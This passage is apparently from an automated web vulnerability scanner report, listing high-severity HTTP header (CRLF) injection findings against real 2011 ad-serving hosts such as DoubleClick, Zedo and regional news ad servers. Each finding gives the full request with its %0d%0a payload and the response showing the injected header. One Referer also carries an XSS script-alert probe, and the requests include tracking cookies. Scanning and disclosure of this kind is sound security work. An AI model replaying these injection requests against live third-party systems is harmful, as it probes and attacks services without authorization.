Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49a4e
fea689c0339
/N1057.280341.AOL.COMADVERTISING/B5447531.7;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001024394/cstr=54039788=_4dfa4b0b,6354081067,768034^1024394^1183^0,1_/xsxdata=$xsxdata/bnum=54039788/optn=64
Date: Thu, 16 Jun 2011 18:28:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adj/N4190.advertising.com/B5416523.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4190.advertising.com/B5416523.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1215f%0d%0a1faea7da71e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1215f%0d%0a1faea7da71e/N4190.advertising.com/B5416523.2;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001008685/cstr=3488355=_4dfa5250,1828847536,768034%5E1008685%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=3488355/optn=64?trg=;ord=1828847536? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308250703177&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1215f
1faea7da71e
/N4190.advertising.com/B5416523.2;sz=728x90;click=http: //r1-ads.ace.advertising.com/click/site=0000768034/mnum=0001008685/cstr=3488355=_4dfa5250,1828847536,768034^1008685^1183^0,1_/xsxdata=$xsxdata/bnum=3488355/optn=64
Date: Thu, 16 Jun 2011 18:59:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/N6046.134363.2043285697521/B5118749.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N6046.134363.2043285697521/B5118749.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 91c76%0d%0a816a901a517 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /91c76%0d%0a816a901a517/N6046.134363.2043285697521/B5118749.4;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000993430/cstr=33615280=_4dfa54c7,4721737206,768033%5E993430%5E1183%5E0,1_/xsxdata=$xsxdata/bnum=33615280/optn=64?trg=;ord=4721737206? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308251334943&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/91c76
816a901a517
/N6046.134363.2043285697521/B5118749.4;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000993430/cstr=33615280=_4dfa54c7,4721737206,768033^993430^1183^0,1_/xsxdata=$xsxdata/bnum=33615280/optn=64
Date: Thu, 16 Jun 2011 19:10:01 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/front_nonsub

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 82c25%0d%0ad0abc40537d was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /82c25%0d%0ad0abc40537d/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=8144814481448144;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/82c25
d0abc40537d
/interactive.wsj.com/front_nonsub;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=8;sz=336x280,300x250;ord=8144814481448144;:
Date: Thu, 16 Jun 2011 11:24:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/nbcu.cnbc/home_homeus [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/home_homeus

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9ae29%0d%0a722f0480e14 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9ae29%0d%0a722f0480e14/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=582942091860? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9ae29
722f0480e14
/nbcu.cnbc/home_homeus;site=cnbc;sect=home;sub=homeus;pageid=15839285;!c=home;!c=homeus;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=582942091860:
Date: Thu, 16 Jun 2011 11:27:13 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/nbcu.cnbc/news_us [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/news_us

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4eabc%0d%0ab898c22b5c2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4eabc%0d%0ab898c22b5c2/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=rlestate;pageid=43418837;pkid=111;pkid=117;!c=news;!c=us;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=112909254851? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4eabc
b898c22b5c2
/nbcu.cnbc/news_us;site=cnbc;sect=news;sub=us;sub2=rlestate;pageid=43418837;pkid=111;pkid=117;!c=news;!c=us;tandomad=none;pm=1;pos=1;tile=1;sz=88x31;ord=112909254851:
Date: Thu, 16 Jun 2011 11:27:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/adj/nbcu.cnbc/search [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/search

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6a34c%0d%0a672eba945fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6a34c%0d%0a672eba945fc/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=808273578585? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss3a34b%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E7c5fa54ba36cca68&categories=exclude&searchboxinput=xss
Cookie: id=c60bd0733000097|2703878/1001371/15138,3226301/1106615/15127|t=1297260501|et=730|cs=g_qf15ye; rsi_segs=E11178_10001

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a34c
672eba945fc
/nbcu.cnbc/search;site=cnbc;sect=search;!c=search;tandomad=none;pm=1;dcopt=ist;pos=2;tile=2;sz=300x250;ord=808273578585:
Date: Fri, 17 Jun 2011 10:13:17 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ads.cleveland.com/RealMedia/ads/adstream.cap [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.cleveland.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload dcfdb%0d%0a855b65252b8 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=dcfdb%0d%0a855b65252b8&va=0&e=1s HTTP/1.1
Host: ads.cleveland.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:08 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: dcfdb
855b65252b8
=0; expires=Thu, 16-Jun-11 13:09:09 GMT; path=/; domain=.cleveland.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:08 GMT;path=/;httponly


2.16. http://ads.cleveland.com/RealMedia/ads/adstream.cap [va parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.cleveland.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 79ef9%0d%0a1c69c390e7f was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=79ef9%0d%0a1c69c390e7f&e=1s HTTP/1.1
Host: ads.cleveland.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:34 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=79ef9
1c69c390e7f
; expires=Thu, 16-Jun-11 13:09:35 GMT; path=/; domain=.cleveland.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:34 GMT;path=/;httponly


2.17. http://ads.nj.com/RealMedia/ads/adstream.cap [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.nj.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload 6bee4%0d%0aa3daea546bc was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=6bee4%0d%0aa3daea546bc&va=0&e=1s HTTP/1.1
Host: ads.nj.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:33 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 6bee4
a3daea546bc
=0; expires=Thu, 16-Jun-11 13:09:34 GMT; path=/; domain=.nj.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:33 GMT;path=/;httponly


2.18. http://ads.nj.com/RealMedia/ads/adstream.cap [va parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.nj.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload 83c87%0d%0a30a11bfc5db was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=83c87%0d%0a30a11bfc5db&e=1s HTTP/1.1
Host: ads.nj.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:59 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=83c87
30a11bfc5db
; expires=Thu, 16-Jun-11 13:10:00 GMT; path=/; domain=.nj.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:59 GMT;path=/;httponly


2.19. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.oregonlive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload 2a988%0d%0a9e43732671d was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=2a988%0d%0a9e43732671d&va=0&e=1s HTTP/1.1
Host: ads.oregonlive.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:09:46 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 2a988
9e43732671d
=0; expires=Thu, 16-Jun-11 13:09:47 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:19:46 GMT;path=/;httponly


2.20. http://ads.oregonlive.com/RealMedia/ads/adstream.cap [va parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.oregonlive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload afc6d%0d%0a529f13d80d2 was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=afc6d%0d%0a529f13d80d2&e=1s HTTP/1.1
Host: ads.oregonlive.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 13:10:12 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=afc6d
529f13d80d2
; expires=Thu, 16-Jun-11 13:10:13 GMT; path=/; domain=.oregonlive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929171e45525d5f4f58455e445a4a423660;expires=Thu, 16-Jun-2011 13:20:12 GMT;path=/;httponly


2.21. http://c7.zedo.com/img/bh.gif [a parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /img/bh.gif

Issue detail

The value of the a request parameter is copied into the Set-Cookie response header. The payload c17e4%0d%0a6a4fbda8351 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /img/bh.gif?n=305&g=20&a=c17e4%0d%0a6a4fbda8351&s=1&t=i HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation%3FlangId%3D-1%26storeId%3D10051%26catalogId%3D10053%26Nu%3DP_PARENT_ID%26searchNav%3Dtrue&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment&dtmc_prop_two=3bc35c3f-44ee-45ce-a5d3-315a00fe8438&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; FFgeo=2241452; ZEDOIDX=13; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819:1219,17#736041,15#736039|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1:0,30,1:0,30,1; FFCap=1595B305,201787:933,196008,139660:1219,217400,217401|0,13,1:0,30,1:0,30,1:0,30,1:0,30,1; ZFFAbh=879B826,20|1477_897#383Z120_879#365

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 45
Content-Type: image/gif
Set-Cookie: FFAbh=897B305,20|165_1#365Zc17e4
6a4fbda8351
_1#365;expires=Fri, 15 Jun 2012 11: 29:33 GMT;domain=.zedo.com;path=/;
ETag: "85ecfbee-7054-49420a02cd680"
X-Varnish: 1708187920 1708184115
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=28998
Expires: Thu, 16 Jun 2011 19:32:51 GMT
Date: Thu, 16 Jun 2011 11:29:33 GMT
Connection: close

GIF89a.............!.......,...........D..;


2.22. http://matcher.bidder7.mookie1.com/google [cver parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://matcher.bidder7.mookie1.com
Path:   /google

Issue detail

The value of the cver request parameter is copied into the X-ZAMA-MATCHER-ERROR response header. The payload c1f09%0d%0a5b1c06f975e was submitted in the cver parameter. This caused a response containing an injected HTTP header.

Request

GET /google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=c1f09%0d%0a5b1c06f975e HTTP/1.1
Host: matcher.bidder7.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QXErgU10I1k; dlx_20100929=set; other_20110126=set; id=2814750682866683; session=1308239531|1308240466; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:08:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-ZAMA-MATCHER-ERROR: google has sent non numeric (or zero) cver 'c1f09
5b1c06f975e
'
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

2.23. http://tacoda.at.atwola.com/rtx/r.gif [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.gif

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 74bfe%0d%0a5a8ec25802e was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.gif?cmd=ESU&si=18201&pi=-&xs=3 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/2939?ret=html&phint=keywords%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&phint=__bk_t%3DCredit%20Cards%20-%20Compare%20Credit%20Card%20Offers%20at%20CreditCards.com&phint=__bk_k%3Dcredit%20cards%2C%20credit%20card%2C%20credit%2C%20creditcards%2C%20visa%2C%20offers%2C%20search%2C%20compare%2C%20apply%2C%20mastercard%2C%20low%20interest%2C%20student%2C%20instant%20approval%2C%20balance%20transfer%2C%20reward%2C%20business%2C%20student%2C%20cash%20back&limit=4&r=92667289
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DD6D67B6E651A440C6EAF39F001EBEA; ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; TData=99999|^|51134|56282|61674|57094|60740|56297|57130|57129|61576|51184|53380|60489|60515|52615|57289|52946|53656|55401|50507|50557|54255|53778|51182|54252|50961|54209|56988|57372|56780|56232|56142|56768|56761|56681|56153; N=2:b1077b952a25f0fd4f2da32539b57495,f09c3ed82a5deedcd5f3f90b36c3d89674bfe%0d%0a5a8ec25802e; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NjE2NzQ6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NjE1NzY6NTExODQ6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1MDc6NTA1NTc6NTQyNTU6NTM3Nzg6NTExODI6NTQyNTI6NTA5NjE6NTQyMDk6NTY5ODg6NTczNzI6NTY3ODA6NTYyMzI=

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:41:46 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Fri, 17 Jun 2011 10:56:46 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZ0NTFrbzA5NGswa3U=; path=/; expires=Mon, 11-Jun-12 10:41:46 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Fri, 24-Jun-11 10:41:46 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1308307172^1308309106|18201^1308307172^1308309106; path=/; expires=Fri, 17-Jun-11 11:11:46 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56282|57094|60740|56297|57130|57129|53380|60489|60515|52615|57289|52946|53656|55401|50557|54255|53778|54252|50961|54209|56681|55467|56969|56835|56780|56232|56673|56768|57372|56761|54208|57288|52947|56153; expires=Mon, 11-Jun-12 10:41:46 GMT; path=/; domain=tacoda.at.atwola.com
